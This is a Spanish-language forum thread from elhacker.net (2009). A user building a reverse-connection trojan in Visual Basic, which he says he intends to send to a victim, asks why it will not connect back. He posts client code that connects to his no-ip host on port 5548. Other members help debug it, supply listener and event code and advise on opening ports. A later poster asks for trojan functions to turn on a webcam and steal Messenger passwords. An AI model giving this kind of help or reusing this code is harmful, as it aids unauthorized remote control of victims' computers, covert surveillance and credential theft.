elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda Troyano conexion inversa
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Troyano conexion inversa  (Leído 8,795 veces)
sircam666

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Ayuda Troyano conexion inversa
« en: 24 Junio 2009, 00:57 am »

Saludos

regreso a este foro despues de ojearlo hace ya bastante tiempo para ver si alguien me puede ayudar con un problema,
estoy creando un troyano en VB de conexion inversa y pues tecnicamente ya termine, pero las pruebas las estaba realizando en el mismo PC, es decir el winsock se conectaba a la IP local,
entonces luego cambie por un dominio en noip.com, dado que mi IP es dinamica y ya tenia intenciones de enviarlo a la victima, pero antes de enviarlo, decidi probar en la misma PC ( no se si es por eso..)  y pues puse el programa a la escucha y ejecute el otro que se deberia conectar pero no paso nada...
entonces para mirar que pasaba puse un Msgbox que me indicaba el estado de conexion y me arrojo 4, mire y dice que es Resolviendo Host, y pues la verdad no se que significa XD, ni tampoco como arreglarlo jeje,
agradezco mucho a el que me pueda colaborar, es mi primer troyano usando el CSocketMaster , y creo que me estaba quedando bien jejeje
Gracias de antemano


En línea

sircam666

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Ayuda Troyano conexion inversa
« Respuesta #1 en: 24 Junio 2009, 03:51 am »

Vamos, nadie me ayuda XD   :silbar:

jeje


En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Ayuda Troyano conexion inversa
« Respuesta #2 en: 24 Junio 2009, 04:49 am »

buenas, lo que te recomiendo para ayudarte con mas precicion es que dejes tu codigo de como hiciste la conexion, y fijate de que el CScoketMaster lo hayas bajado de la pagina oficial

saludos
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
sircam666

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Ayuda Troyano conexion inversa
« Respuesta #3 en: 24 Junio 2009, 18:21 pm »

en ese caso pongo el fracmento de codigo que se supone coloca a la escucha el Cliente

Private Sub Command1_Click()
ws2.CloseSck
ws2.Protocol = sckTCPProtocol
ws2.LocalPort = 5548

ws2.Listen
End Sub

y el otro esta en un timer

Private Sub Timer1_Timer()

If Not WS.State = 7 Then
WS.CloseSck
WS.RemotePort = 5548
WS.RemoteHost = "sircam66.no-ip.biz"
WS.Connect

Else
Timer1.Enabled = False
End If
End Sub

y creo que ese seria el pedacito que importa, de todas formas, puedes pasarme la pagina oficial del CSocketMAster
Gracias
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Ayuda Troyano conexion inversa
« Respuesta #4 en: 24 Junio 2009, 18:52 pm »

el code está bien lo que está fallando es el no-ip.. te doy una sugerencia...

porque no le decis a algún voluntario XD(amigo tuyo o algo) y vas probando cada vez que estes en duda,  ahora hace esto:

en vez de poner tu no-ip pone tu ip dinámica común (no vayas a probar con "127.0.0.1"  :P) jaja
y despues pusiste el :

Código
  1. Option Explicit
  2. Public WithEvents ws2 As CSocketMaster

y despues en el form_load:

Código
  1. Set ws2 = New CSocketMaster

y pone un label en el cliente o lo que quieras que sea

Código
  1. if ws2.state = sckConnected then
  2. label.caption = "conectado"
  3. else
  4. label.caption = "desconectado"


un saludo
« Última modificación: 24 Junio 2009, 18:57 pm por fede_cp » En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
sircam666

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Ayuda Troyano conexion inversa
« Respuesta #5 en: 24 Junio 2009, 22:46 pm »

Saludos

bueno probe lo que me dijiste y no funciono no se porque  :huh:
le cambie el dominio de no-ip por mi ip se lo envie a mi amigo y le deje el msgbox que muestra el estado de la conexión, entoces coloce a escuchar el programa en mi pc y le dije a mi compañero que lo ejecutara y bueno le salieron los mensajes de el estado y siempre era 6, osea conectando, y no se conectaba
igual cada vez que el le daba aceptar a el Msgbox se supone que se debia interntar conectar pero no sirvio, la verdad no tengo idea.........
la otra duda que me surgio ahora es que el winsock tiene otro protocolo que es UDP y quisiera saber si con este protocolo se podria hacer un troyano, la verdad se muy poco acerca de este pero, me nace la duda
Gracias
En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: Ayuda Troyano conexion inversa
« Respuesta #6 en: 24 Junio 2009, 23:13 pm »

Este es un ejemplo con CSocketPlus es igual que el CSocketMaster solo que:

CSocketPlu= Usa Arrays
CSocketMaster= No usa Array

PERO SUS EVENTOS SON LOS MISMOS Tomando en cuenta la diferencia de INDEX

A lo que voy es que pruebes con poner el ConnectionRequestID:

Para CSocketMaster:
Revisa este por que no cuento con los archivos del CSocketMaster asi que deduci lo siguiente...¡!
Código
  1. Dim WithEvents ws0 As CSocketPMater
  2. 'En un procesoX
  3. Set ws0 = New CSocketMaster
  4. 'ws0.CloseSck 'Cuando agregas uno ya esta cerrado por logica
  5. ws0.LocalPort = 453
  6. ws0.Listen
  7. 'Fin de Proceso X
  8.  
  9. Private Sub ws0_ConnectionRequest(ByVal requestID As Long)
  10.    ws0.CloseSck
  11.    ws0.Accept requestID
  12. End Sub
  13.  
  14. Private Sub ws0_DataArrival(ByVal bytesTotal As Long)
  15.    Dim datos As String
  16.    ws0.GetData datos, vbString
  17.    Text1 = Text1 & vbCrLf & datos
  18. End Sub
  19.  

Para CSocketPlus

Código
  1. Dim WithEvents ws0 As CSocketPlus
  2. 'En un procesoX
  3. Set ws0 = New CSocketPlus
  4. ws0.ArrayAdd 0
  5. 'ws0.CloseSck 0 'Cuando agregas uno ya esta cerrado por logica
  6. ws0.LocalPort(0) = 453
  7. ws0.Listen 0
  8. 'Fin de Proceso X
  9.  
  10. Private Sub ws0_ConnectionRequest(ByVal Index As Variant, ByVal requestID As Long)
  11.    ws0.CloseSck Index
  12.    ws0.Accept Index, requestID
  13. End Sub
  14.  
  15. Private Sub ws0_DataArrival(ByVal Index As Variant, ByVal bytesTotal As Long)
  16.    Dim datos As String
  17.    ws0.GetData Index, datos, vbString
  18.    Text1 = Text1 & vbCrLf & datos
  19. End Sub
  20.  

Como viste la unica diferencia es que en uno siempre se maneja una variable index (CSocketPluys) y en otro no (CSocketMaster).


Para ver si esta conectado o no sin usar timer en donde usas el Sock con el evento Connect es decir el cliente no el servidor (en el source donde espesificas el ip a conectar). puedes meter estos eventos

CSocketMaster:
Código
  1. Private Sub ws0_Connect()
  2.    MsgBox "Socket Conectado"
  3. End Sub
  4. Private Sub ws0_CloseSck()
  5.    MsgBox "Socket Desconectado"
  6. End Sub
  7. Private Sub ws0_Error( ByVal Number As Integer, Description As String, ByVal sCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
  8.    MsgBox "Sock Error"
  9. End Sub
  10.  

CSocketPlus
Código
  1. Private Sub ws0_Connect(ByVal Index As Variant)
  2.    MsgBox "Socket Conectado"
  3. End Sub
  4. Private Sub ws0_CloseSck(ByVal Index As Variant)
  5.    MsgBox "Socket Desconectado"
  6. End Sub
  7. Private Sub ws0_Error(ByVal Index As Variant, ByVal Number As Integer, Description As String, ByVal sCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
  8.    MsgBox "Sock Error"
  9. End Sub
  10.  

P.D.: Con respecto a la DNS sea cual sea (No-ip,dyndns o como sea "X")  deberias rectificar los puetos que deberias abrir para tal acción, tanto en firewall de windows como de av como los de router si llegases a usar (Esto va en su foro correspondiente).

Dulces Lunas¡!
« Última modificación: 24 Junio 2009, 23:26 pm por ░▒▓BlackZeroҖ▓▒░ » En línea

The Dark Shadow is my passion.
sircam666

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Ayuda Troyano conexion inversa
« Respuesta #7 en: 24 Junio 2009, 23:49 pm »

Gracias, igual ahora me voy de viaje espero llegar con nuevas energias para terminar ese troyano, talves tenga que volver a el papel y diseñhazlo de nuevo con el CSocketPlus

Gracias
En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: Ayuda Troyano conexion inversa
« Respuesta #8 en: 25 Junio 2009, 04:08 am »

que ganas ░▒▓BlackZeroҖ▓▒░...reconozoco tu ganas de ayudar...pero habiendo tantos ejemplos basicos de estos "programas" de troyanos suelto en internet...ya no es ayudar sino dar en bandeja...que se "maten" buscando en internet vos no te preocupes...ya todos estos temas que preguntan como hacer un troyano ya todos los foreros debemos saber que tienen que buscar en internet otra no hay...pero ni le des mas codigo que lo busquen como nosotros tuvimos que buscarlo algun dia...porque sino van a venir a preguntar cualuquier "duda" y nosotros los "bulu del foro" le vamos a contestar...esto no va para este tema ..sino para todos los temas que haya asi igual en el foro...ya lo dije alguna vez..pero ni caso hacen...

saludos.
En línea

mr_marley

Desconectado Desconectado

Mensajes: 50



Ver Perfil
Re: Ayuda Troyano conexion inversa
« Respuesta #9 en: 26 Junio 2009, 21:04 pm »

HOla sabes yo tambien me estoy programando un troyano si me pudieras ayudar con algunas funciones como prenderle la webcam.. sacar el password local del messenger
algo

By:Marley87
En línea

Cuántas muertes más serán necesarias para darnos cuenta de que ya han sido demasiadas  By: Marley87
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Generar Servidor de Troyano de conexion inversa
Programación General
14K 1 2,099 Último mensaje 24 Junio 2013, 02:39 am
por engel lex
¿Que troyano de conexión inversa recomiendan actualmente?
Hacking
Trydox09 4 5,652 Último mensaje 18 Septiembre 2013, 22:47 pm
por GenR_18
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines